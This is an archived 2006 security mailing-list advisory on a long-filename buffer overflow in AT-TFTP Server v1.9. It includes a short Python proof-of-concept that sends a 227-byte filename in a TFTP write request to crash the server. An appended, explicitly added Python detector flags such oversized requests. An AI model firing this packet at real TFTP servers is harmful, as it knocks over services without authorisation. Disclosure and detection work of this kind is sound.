Network Security Vuln-Dev

Subject: TFTP Server AT-TFTP Server v 1.9 Buffer Overflow Vulnerability (Long filename)
Date: 26 Nov 2006 12:30:41 -0000
TFTP Server AT-TFTP Server v 1.9 Buffer Overflow Vulnerability (Long filename)

------------------------------------------------------------------
SUMMARY:

AT-TFTP Server is a Freeware TFTP server for Windows 9x/NT/XP.
(http://www.alliedtelesyn.co.uk/en-gb/support/downloads/tools.asp) 
It provides an implementation of the TFTPv2 protocol.

A vulnerability has been identified in TFTP Server AT-TFTP Server v1.9, which 
could be exploited by remote or local attackers to execute arbitrary commands 
or cause a denial of service. This flaw is due to a buffer overflow error when 
handling an overly long file name (more than 227 bytes) passed to a "GET" or 
"PUT" command, which could be exploited by malicious users to compromise a 
vulnerable system or crash an affected application.
----------
DETAILS:

 Vulnerable systems: AT-TFTP Server v 1.9 and probably prior versions
 
Exploit:

#!/usr/bin/python
# Buffer Overflow (Long filename) Vulnerability Exploit
# This is just a DoS exploiting code
# Tested on Windows xp SP2
#
# Requires python and impacket
#
# Coded by Liu Qixu Of NCNIPC

import socket
import sys

host = '192.168.1.11'
port = 69

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except: 
    print "socket() failed"         
    sys.exit(1)

filename = "A" * 227 
mode = "netascii"
data = "\x00\x02" + filename + "\0" + mode + "\0"
s.sendto(data, (host, port))

------------------------------------------
Liu Qixu
NCNIPC
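
A defender-side check for the request format this advisory describes, added here as an example and not part of the original post: it parses a UDP/69 payload as a TFTP read or write request and flags over-long or malformed filename fields. The function name, the alert threshold (set to the 227-byte length used in the post's test packet), and the sample payloads are assumptions constructed for illustration; it is written for Python 3.

```python
import struct

# RFC 1350 request opcodes: 1 = RRQ ("GET"), 2 = WRQ ("PUT").
REQUEST_OPCODES = {1: "RRQ", 2: "WRQ"}
KNOWN_MODES = (b"netascii", b"octet", b"mail")
# Assumption: alert from 227 bytes, the length used in the post's test packet.
FILENAME_ALERT_LEN = 227

# Constructed sample UDP/69 payloads (not captured traffic).
SAMPLES = {
    "normal": b"\x00\x01config.bin\x00octet\x00",
    "long": b"\x00\x02" + b"A" * 227 + b"\x00netascii\x00",
    "unterminated": b"\x00\x01" + b"B" * 300,
    "data": b"\x00\x03\x00\x01hello",
}


def inspect_tftp_request(payload, limit=FILENAME_ALERT_LEN):
    """Return a verdict dict for an RRQ/WRQ payload, or None for anything else."""
    if len(payload) < 4:
        return None
    (opcode,) = struct.unpack("!H", payload[:2])
    if opcode not in REQUEST_OPCODES:
        return None
    body = payload[2:]
    end = body.find(b"\x00")
    # Without a terminator the whole remainder counts as the filename field.
    filename = body if end == -1 else body[:end]
    reasons, mode = [], b""
    if len(filename) >= limit:
        reasons.append("filename length %d >= %d" % (len(filename), limit))
    if end == -1:
        reasons.append("filename not NUL-terminated")
    else:
        rest = body[end + 1:]
        mode_end = rest.find(b"\x00")
        mode = rest if mode_end == -1 else rest[:mode_end]
        if mode_end == -1:
            reasons.append("mode not NUL-terminated")
        if mode.lower() not in KNOWN_MODES:
            reasons.append("unknown transfer mode")
    return {"op": REQUEST_OPCODES[opcode], "filename_len": len(filename),
            "mode": mode.decode("ascii", "replace"),
            "alert": bool(reasons), "reasons": reasons}


if __name__ == "__main__":
    for name, pkt in SAMPLES.items():
        print(name, inspect_tftp_request(pkt))
```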
